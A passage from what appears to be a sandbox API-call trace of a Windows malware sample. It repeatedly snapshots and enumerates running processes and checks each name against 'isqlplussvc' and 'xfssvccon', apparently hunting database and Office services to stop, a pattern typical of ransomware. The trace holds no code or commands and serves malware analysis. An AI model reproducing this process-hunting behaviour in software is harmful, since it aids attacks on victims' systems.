lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0093.734] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0093.734] StrStrIA (lpFirst="ripe.exe", lpSrch="isqlplussvc") returned 0x0 [0093.734] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0093.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.735] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35689b8 [0093.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35689b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0093.735] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0093.736] StrStrIA (lpFirst="acoustic.exe", lpSrch="isqlplussvc") returned 0x0 [0093.736] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0093.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.736] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568820 [0093.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3568820, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0093.750] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0093.750] StrStrIA (lpFirst="mail.exe", lpSrch="isqlplussvc") returned 0x0 [0093.750] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.751] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35688b0 [0093.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35688b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.751] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.751] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="isqlplussvc") returned 0x0 [0093.751] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.753] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35689d0 [0093.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35689d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.753] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.753] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.753] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.754] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568958 [0093.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568958, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.754] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0093.754] StrStrIA (lpFirst="dllhost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.754] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.756] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35689e8 [0093.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35689e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.756] StrStrIA (lpFirst="taskhostw.exe", lpSrch="isqlplussvc") returned 0x0 [0093.756] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0093.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.757] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568970 [0093.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3568970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0093.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0093.757] StrStrIA (lpFirst="UsoClient.exe", lpSrch="isqlplussvc") returned 0x0 [0093.757] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.758] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35688c8 [0093.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35688c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.758] StrStrIA (lpFirst="taskhostw.exe", lpSrch="isqlplussvc") returned 0x0 [0093.758] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0093.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0093.759] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3569668 [0093.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3569668, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0093.759] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0093.759] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="isqlplussvc") returned 0x0 [0093.759] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0093.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.760] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35697a8 [0093.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x35697a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0093.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0093.760] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="isqlplussvc") returned 0x0 [0093.761] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0093.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.761] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566b60 [0093.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x3566b60, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0093.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0093.762] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="isqlplussvc") returned 0x0 [0093.762] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.763] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568748 [0093.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.763] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.763] StrStrIA (lpFirst="conhost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.763] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.764] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568778 [0093.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.764] StrStrIA (lpFirst="conhost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.764] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.765] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568790 [0093.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.765] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.765] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0093.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.766] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568730 [0093.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3568730, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0093.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0093.766] StrStrIA (lpFirst="rxodge.exe", lpSrch="isqlplussvc") returned 0x0 [0093.766] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.767] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568940 [0093.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3568940, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0093.768] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0093.768] StrStrIA (lpFirst="sppsvc.exe", lpSrch="isqlplussvc") returned 0x0 [0093.768] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0093.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.770] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35695c8 [0093.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x35695c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0093.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0093.770] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="isqlplussvc") returned 0x0 [0093.770] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0093.771] CloseHandle (hObject=0x358) returned 1 [0093.771] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0093.791] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.792] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35696c8 [0093.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x35696c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0093.792] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0093.792] StrStrIA (lpFirst="[System Process]", lpSrch="xfssvccon") returned 0x0 [0093.792] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0093.793] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547968 [0093.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547968, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0093.793] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0093.793] StrStrIA (lpFirst="System", lpSrch="xfssvccon") returned 0x0 [0093.793] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.794] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35687c0 [0093.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35687c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0093.794] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0093.794] StrStrIA (lpFirst="smss.exe", lpSrch="xfssvccon") returned 0x0 [0093.794] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.796] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568988 [0093.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3568988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.796] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.796] StrStrIA (lpFirst="csrss.exe", lpSrch="xfssvccon") returned 0x0 [0093.796] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.798] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35687d8 [0093.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35687d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0093.798] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0093.798] StrStrIA (lpFirst="wininit.exe", lpSrch="xfssvccon") returned 0x0 [0093.798] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, 